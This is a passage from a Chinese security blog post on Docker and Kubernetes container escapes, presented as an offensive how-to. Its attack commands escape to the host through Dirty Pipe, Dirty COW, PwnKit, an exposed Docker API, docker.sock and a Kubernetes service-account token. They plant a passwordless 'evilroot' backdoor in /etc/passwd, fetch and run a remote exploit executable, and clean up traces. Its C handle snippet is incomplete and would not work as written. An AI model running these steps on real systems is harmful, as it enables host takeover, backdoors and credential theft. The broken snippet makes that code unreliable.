<li><strong>输出示例</strong>：<br><code>CapEff: 0000003fffffffff</code>（包含 <code>CAP_DAC_READ_SEARCH</code>，16进制值中的第2位为 <code>1</code>）。</li>
</ul>
<p><strong>步骤 2：获取宿主机文件句柄</strong></p>
<p>利用 <code>open_by_handle_at</code> 系统调用访问宿主机文件：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-comment">// 示例代码：获取宿主机 /etc/passwd 的文件描述符</span><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> _GNU_SOURCE</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;fcntl.h&gt;</span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/types.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>&#123;<br>    <span class="hljs-keyword">struct</span> <span class="hljs-title class_">file_handle</span> *handle;<br>    <span class="hljs-type">int</span> mount_id;<br>    <span class="hljs-type">char</span> buf[<span class="hljs-number">256</span>];<br>    <br>    <span class="hljs-comment">// 获取挂载点信息（需 CAP_DAC_READ_SEARCH）</span><br>    <span class="hljs-built_in">sprintf</span>(buf, <span class="hljs-string">&quot;/etc/passwd&quot;</span>);<br>    handle = (<span class="hljs-keyword">struct</span> file_handle *)<span class="hljs-built_in">malloc</span>(<span class="hljs-built_in">sizeof</span>(<span class="hljs-keyword">struct</span> file_handle) + <span class="hljs-number">256</span>);<br>    handle-&gt;handle_bytes = <span class="hljs-number">256</span>;<br>    <br>    <span class="hljs-comment">// 调用 open_by_handle_at</span><br>    <span class="hljs-type">int</span> fd = <span class="hljs-built_in">open_by_handle_at</span>(AT_FDCWD, handle, O_RDWR);<br>    <span class="hljs-keyword">return</span> fd; <span class="hljs-comment">// 返回文件描述符</span><br>&#125;<br></code></pre></td></tr></table></figure>

<ul>
<li><p>编译并运行：</p>
<figure class="highlight asciidoc"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs asciidoc">gcc get<span class="hljs-emphasis">_fd.c -o get_fd</span><br><span class="hljs-emphasis">./get_</span>fd<br></code></pre></td></tr></table></figure></li>
</ul>
<p><strong>步骤 3：结合 Dirty Pipe 覆盖文件</strong></p>
<p>使用 Dirty Pipe EXP（如 CVE-2022-0847 PoC）修改宿主机文件：</p>
<figure class="highlight swift"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs swift"># 通过获取的文件描述符覆盖宿主机 <span class="hljs-regexp">/etc/</span>passwd<br><span class="hljs-operator">./</span>dirtypipe <span class="hljs-regexp">/proc/</span><span class="hljs-keyword">self</span><span class="hljs-regexp">/fd/</span><span class="hljs-operator">&lt;</span>返回的fd<span class="hljs-operator">&gt;</span> <span class="hljs-number">1</span> <span class="hljs-string">&quot;evilroot::0:0::/:/bin/bash<span class="hljs-subst">\n</span>&quot;</span><br></code></pre></td></tr></table></figure>

<ul>
<li>关键参数：<ul>
<li><code>/proc/self/fd/&lt;fd&gt;</code>：通过文件描述符指向宿主机文件。</li>
<li><code>1</code>：从文件第1字节后开始覆盖。</li>
<li><code>evilroot::...</code>：添加无密码 root 用户。</li>
</ul>
</li>
</ul>
<p><strong>步骤 4：验证逃逸</strong></p>
<p>在宿主机执行：</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">su</span> evilroot  <span class="hljs-comment"># 直接获得宿主机 root 权限</span><br></code></pre></td></tr></table></figure>

<p>后面的利用利用过程是差不多的，只是利用路径、内核提权的方式不同，所以依葫芦画瓢去做就行了，just do it!!!</p>
<h4 id="2-Dirty-COW（CVE‑2016‑5195）"><a href="#2-Dirty-COW（CVE‑2016‑5195）" class="headerlink" title="2. Dirty COW（CVE‑2016‑5195）"></a>2. Dirty COW（CVE‑2016‑5195）</h4><p>通过触发 Linux 内核内存管理子系统中的写时复制（Copy-on-Write）竞态条件漏洞，在容器内以普通用户权限对宿主机挂载的只读文件（如 <code>/etc/passwd</code>）发起并发内存映射操作（<code>madvise</code> 与 <code>mprotect</code>），绕过文件权限检查，直接修改宿主机文件内容（如插入 <code>evilroot::0:0::/:/bin/bash</code>），从而在宿主机层面注入特权用户，最终通过 <code>su</code> 或 SSH 认证获得宿主机 root 权限，穿透容器命名空间隔离。</p>
<p><strong>前置</strong>：内核未修补 Dirty COW</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">git <span class="hljs-built_in">clone</span> https://github.com/mdsecactive/DirtyCOW.git<br><span class="hljs-built_in">cd</span> DirtyCOW<br>gcc dirtyc0w.c -o dirtyc0w -pthread<br>./dirtyc0w /etc/passwd <span class="hljs-string">&quot;root::0:0:root:/root:/bin/bash&quot;</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>将 <code>/etc/passwd</code> 中 root 密码字段清空，实现本地提权。 </p>
</blockquote>
<h4 id="3-Polkit-提权（CVE‑2021‑4034-PwnKit）"><a href="#3-Polkit-提权（CVE‑2021‑4034-PwnKit）" class="headerlink" title="3. Polkit 提权（CVE‑2021‑4034 PwnKit）"></a>3. Polkit 提权（CVE‑2021‑4034 PwnKit）</h4><p>可在容器内通过伪造环境变量（如 <code>GCONV_PATH</code>）诱使宿主机上的 <code>pkexec</code> 工具加载恶意代码，利用其 SUID 权限以宿主机 root 身份执行任意命令（如反弹 Shell 或篡改文件），从而突破容器隔离控制宿主机。</p>
<p><strong>前置</strong>：Polkit (pkexec) 未修补</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash">git <span class="hljs-built_in">clone</span> https://github.com/antonioCoco/PwnKit.git<br><span class="hljs-built_in">cd</span> PwnKit<br>gcc pwn.c -o pwnkit<br>./pwnkit<br></code></pre></td></tr></table></figure>

<blockquote>
<p>利用 pkexec 漏洞获得 root，然后结合挂载进入宿主系统。 </p>
</blockquote>
<hr>
<h3 id="四、网络与-API-攻击"><a href="#四、网络与-API-攻击" class="headerlink" title="四、网络与 API 攻击"></a>四、网络与 API 攻击</h3><h4 id="1-未授权-Docker-Remote-API"><a href="#1-未授权-Docker-Remote-API" class="headerlink" title="1. 未授权 Docker Remote API"></a>1. 未授权 Docker Remote API</h4><p>未配置认证的 Docker Remote API（如 2375 端口）远程创建privileged特权容器，或挂载宿主机根目录（如 <code>-v /:/mnt</code>），利用容器内进程对挂载目录的读写权限直接篡改宿主机敏感文件（如 <code>/root/.ssh/authorized_keys</code> 或 <code>/etc/crontab</code>），从而植入后门或反弹 Shell，最终绕过容器隔离以宿主机 root 权限执行任意命令</p>
<p><strong>前置</strong>：Docker daemon 暴露 2375 端口且无 TLS 认证</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 远程拉取并运行特权容器</span><br>docker -H tcp://TARGET:2375 pull alpine<br>docker -H tcp://TARGET:2375 run -v /:/host --privileged -it alpine <span class="hljs-built_in">chroot</span> /host sh<br></code></pre></td></tr></table></figure>

<blockquote>
<p>获得宿主机 root Shell。 </p>
</blockquote>
<h4 id="2-Kubernetes-API-滥用"><a href="#2-Kubernetes-API-滥用" class="headerlink" title="2. Kubernetes API 滥用"></a>2. Kubernetes API 滥用</h4><p>Kubernetes错误配置，导致可以创建Pod，通过给 Kubernetes 集群中配置不当的 RBAC 权限或 Pod 安全策略（如允许创建特权容器或挂载宿主机目录），利用 API 创建挂载宿主机根目录（如 <code>hostPath: /</code>）的恶意 Pod，在容器内直接读写宿主机文件系统（如篡改 <code>/etc/crontab</code> 或写入 SSH 密钥），从而以宿主机 root 权限执行任意命令，突破容器隔离控制集群节点。</p>
<p><strong>前置</strong>：容器内可访问 &#x2F;var&#x2F;run&#x2F;secrets&#x2F;kubernetes.io&#x2F;serviceaccount，需要用户登录认证，保证能使用Kubernetes API</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-comment"># 提取 Token</span><br><span class="hljs-attr">TOKEN</span>=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)<br><br><span class="hljs-comment"># 提取 CA 证书</span><br><span class="hljs-attr">CA_CERT</span>=<span class="hljs-string">&quot;/var/run/secrets/kubernetes.io/serviceaccount/ca.crt&quot;</span><br><br><span class="hljs-comment"># 获取当前命名空间（通常为 Pod 所属的 Namespace）</span><br><span class="hljs-attr">NAMESPACE</span>=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)<br><br><span class="hljs-comment"># 获取 Kubernetes API Server 地址（通常是内部地址）</span><br><span class="hljs-attr">API_SERVER</span>=<span class="hljs-string">&quot;https://kubernetes.default.svc&quot;</span><br></code></pre></td></tr></table></figure>

<hr>
<p><strong>2. 配置 <code>kubectl</code> 使用 ServiceAccount Token</strong></p>
<p>如果容器内已安装 <code>kubectl</code>，可直接配置临时访问：</p>
<figure class="highlight dsconfig"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs dsconfig"><span class="hljs-comment"># 生成临时 kubeconfig 文件</span><br><span class="hljs-string">kubectl</span> <span class="hljs-string">config</span> <span class="hljs-built_in">set-cluster</span> <span class="hljs-string">k8s</span> <span class="hljs-built_in">--server=&quot;$API_SERVER&quot;</span> <span class="hljs-built_in">--certificate-authority=&quot;$CA_CERT&quot;</span><br><span class="hljs-string">kubectl</span> <span class="hljs-string">config</span> <span class="hljs-built_in">set-credentials</span> <span class="hljs-string">sa-user</span> <span class="hljs-built_in">--token=&quot;$TOKEN&quot;</span><br><span class="hljs-string">kubectl</span> <span class="hljs-string">config</span> <span class="hljs-built_in">set-context</span> <span class="hljs-string">sa-context</span> <span class="hljs-built_in">--cluster=k8s</span> <span class="hljs-built_in">--user=sa-user</span> <span class="hljs-built_in">--namespace=&quot;$NAMESPACE&quot;</span><br><span class="hljs-string">kubectl</span> <span class="hljs-string">config</span> <span class="hljs-string">use-context</span> <span class="hljs-string">sa-context</span><br></code></pre></td></tr></table></figure>

<hr>
<p><strong>3. 创建挂载宿主机目录的恶意 Pod</strong></p>
<p>使用提供的 YAML 文件 <code>escape-pod.yaml</code>（下面）：</p>
<figure class="highlight coffeescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs coffeescript"><span class="hljs-comment"># 检查是否具备创建 Pod 的权限</span><br>kubectl auth can-i create pods --<span class="hljs-keyword">as</span>=system:serviceaccount:$NAMESPACE:<span class="hljs-keyword">default</span><br><br><span class="hljs-comment"># 提交恶意 Pod 配置</span><br>kubectl apply -f <span class="hljs-built_in">escape</span>-pod.yaml<br></code></pre></td></tr></table></figure>

<hr>
<p><strong>4. 进入恶意 Pod 并逃逸到宿主机</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 进入 Pod 的容器</span><br>kubectl <span class="hljs-built_in">exec</span> -it hostpath-escape -- sh<br><br><span class="hljs-comment"># 通过 chroot 切换根目录到宿主机文件系统</span><br><span class="hljs-built_in">chroot</span> /host sh<br><br><span class="hljs-comment"># 此时已进入宿主机环境，可执行任意操作</span><br><span class="hljs-built_in">echo</span> <span class="hljs-string">&quot;evilroot::0:0::/:/bin/bash&quot;</span> &gt;&gt; /etc/passwd  <span class="hljs-comment"># 示例：添加后门用户</span><br></code></pre></td></tr></table></figure>

<hr>
<p><strong>5. 清理痕迹（可选）</strong></p>
<figure class="highlight coffeescript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs coffeescript"><span class="hljs-comment"># 删除恶意 Pod</span><br>kubectl <span class="hljs-keyword">delete</span> pod hostpath-<span class="hljs-built_in">escape</span><br></code></pre></td></tr></table></figure>

<p><strong>无 <code>kubectl</code> 工具时的替代方案（直接调用 API）</strong></p>
<p>若容器内无 <code>kubectl</code>，可使用 <code>curl</code> 直接操作 Kubernetes API：</p>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-meta"># 步骤1：在容器内提取集群信息</span><br>TOKEN=$(cat <span class="hljs-keyword">/var/</span>run<span class="hljs-keyword">/secrets/</span>kubernetes.io<span class="hljs-keyword">/serviceaccount/</span>token)<br>CA_CERT=<span class="hljs-string">&quot;/var/run/secrets/kubernetes.io/serviceaccount/ca.crt&quot;</span><br>NAMESPACE=$(cat <span class="hljs-keyword">/var/</span>run<span class="hljs-keyword">/secrets/</span>kubernetes.io<span class="hljs-keyword">/serviceaccount/</span>namespace)<br>API_SERVER=<span class="hljs-string">&quot;https://kubernetes.default.svc&quot;</span><br><br><span class="hljs-meta"># 步骤2：生成恶意 Pod YAML 文件</span><br>cat <span class="hljs-params">&lt;&lt;EOF &gt;</span> escape-pod.yaml<br><span class="hljs-symbol">apiVersion:</span> v1<br><span class="hljs-symbol">kind:</span> Pod<br><span class="hljs-symbol">metadata:</span><br><span class="hljs-symbol">  name:</span> hostpath-escape<br><span class="hljs-symbol">spec:</span><br><span class="hljs-symbol">  containers:</span><br>  - name: escape<br><span class="hljs-symbol">    image:</span> alpine<br><span class="hljs-symbol">    command:</span> [<span class="hljs-string">&quot;sh&quot;</span>,<span class="hljs-string">&quot;-c&quot;</span>,<span class="hljs-string">&quot;sleep 3600&quot;</span>]<br><span class="hljs-symbol">    volumeMounts:</span><br>    - name: host-root<br><span class="hljs-symbol">      mountPath:</span> /host<br><span class="hljs-symbol">  volumes:</span><br>  - name: host-root<br><span class="hljs-symbol">    hostPath:</span><br><span class="hljs-symbol">      path:</span> /<br>EOF<br><br><span class="hljs-meta"># 步骤3：构造 API URL 并发送请求</span><br>API_URL=<span class="hljs-string">&quot;$API_SERVER/api/v1/namespaces/$NAMESPACE/pods&quot;</span><br>curl -k -X POST -H <span class="hljs-string">&quot;Authorization: Bearer $TOKEN&quot;</span> \<br>  -H <span class="hljs-string">&quot;Content-Type: application/yaml&quot;</span> \<br>  --data-binary @escape-pod.yaml \<br>  --cacert <span class="hljs-string">&quot;$CA_CERT&quot;</span> \<br>  <span class="hljs-string">&quot;$API_URL&quot;</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p>利用 ServiceAccount Token 调用 <code>kubectl</code> 创建此 Pod。 </p>
</blockquote>
<hr>
<h3 id="五、特殊环境逃逸"><a href="#五、特殊环境逃逸" class="headerlink" title="五、特殊环境逃逸"></a>五、特殊环境逃逸</h3><h4 id="1-macOS-容器逃逸"><a href="#1-macOS-容器逃逸" class="headerlink" title="1. macOS 容器逃逸"></a>1. macOS 容器逃逸</h4><p><strong>前置</strong>：Docker Desktop for Mac 使用 HyperKit</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-comment"># 挂载宿主 docker.sock 并启动</span><br>docker run -v /var/run/docker.sock:/var/run/docker.sock -it alpine sh<br><span class="hljs-comment"># 同“Unix Socket 挂载”方法，创建特权容器</span><br>docker -H unix:///var/run/docker.sock run -v /:/host --privileged -it alpine <span class="hljs-built_in">chroot</span> /host sh<br></code></pre></td></tr></table></figure>

<blockquote>
<p>集成在多数通用 PoC 工具中。 </p>
</blockquote>
<h4 id="2-Windows-容器逃逸"><a href="#2-Windows-容器逃逸" class="headerlink" title="2. Windows 容器逃逸"></a>2. Windows 容器逃逸</h4><p><strong>前置</strong>：利用 Hyper‑V 隔离或 Windows 内核漏洞</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-comment"># 在 Windows 容器内下载并执行 PoC</span><br><span class="hljs-built_in">Invoke-WebRequest</span> <span class="hljs-literal">-Uri</span> https://example.com/CVE<span class="hljs-literal">-2021-34484-WindowsEscape</span>.exe <span class="hljs-literal">-OutFile</span> C:\exploit.exe<br>.\exploit.exe<br></code></pre></td></tr></table></figure>

<blockquote>
<p>PoC 会利用指定 CVE 提权并脱离容器沙箱。 </p>
</blockquote>
<hr>
<h3 id="清理痕迹"><a href="#清理痕迹" class="headerlink" title="清理痕迹"></a>清理痕迹</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs bash">docker container prune -f<br>docker image prune -af<br></code></pre></td></tr></table></figure>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>由一次docker逃逸而起的docker总结</div>
      <div>http://example.com/2025/05/13/由一次docker逃逸而起的docker总结/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Yf3te</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2025年5月13日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/05/05/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8%E5%9F%BA%E7%A1%80%E7%AF%87/" title="横向移动基础篇">
                        <span class="hidden-mobile">横向移动基础篇</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
  
  
    <article id="comments" lazyload>
      
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://lib.baomitu.com/valine/1.5.1/Valine.min.js', function() {
        var options = Object.assign(
          {"appId":"nPsiBpqAh9nfJ5Dy1WuaF7QX-MdYXbMMI","appKey":"uHgPDZvMgamWIL1SjZs4NpY4","path":"window.location.pathname","placeholder":null,"avatar":"retro","meta":["nick","mail","link"],"requiredFields":[],"pageSize":10,"lang":"zh-CN","highlight":false,"recordIP":false,"serverURLs":"","emojiCDN":null,"emojiMaps":null,"enableQQ":false},
          {
            el: "#valine",
            path: window.location.pathname
          }
        )
        new Valine(options);
        Fluid.utils.waitElementVisible('#valine .vcontent', () => {
          var imgSelector = '#valine .vcontent img:not(.vemoji)';
          Fluid.plugins.imageCaption(imgSelector);
          Fluid.plugins.fancyBox(imgSelector);
        })
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


    </article>
  


          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="leancloud-site-pv-container" style="display: none">
        总访问量
        <span id="leancloud-site-pv"></span>
        次
      </span>
    
    
      <span id="leancloud-site-uv-container" style="display: none">
        总访客数
        <span id="leancloud-site-uv"></span>
        人
      </span>
    
    

  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script defer src="/js/leancloud.js" ></script>

  <script  src="/js/local-search.js" ></script>




  
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/Cherry.js"></script>



<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
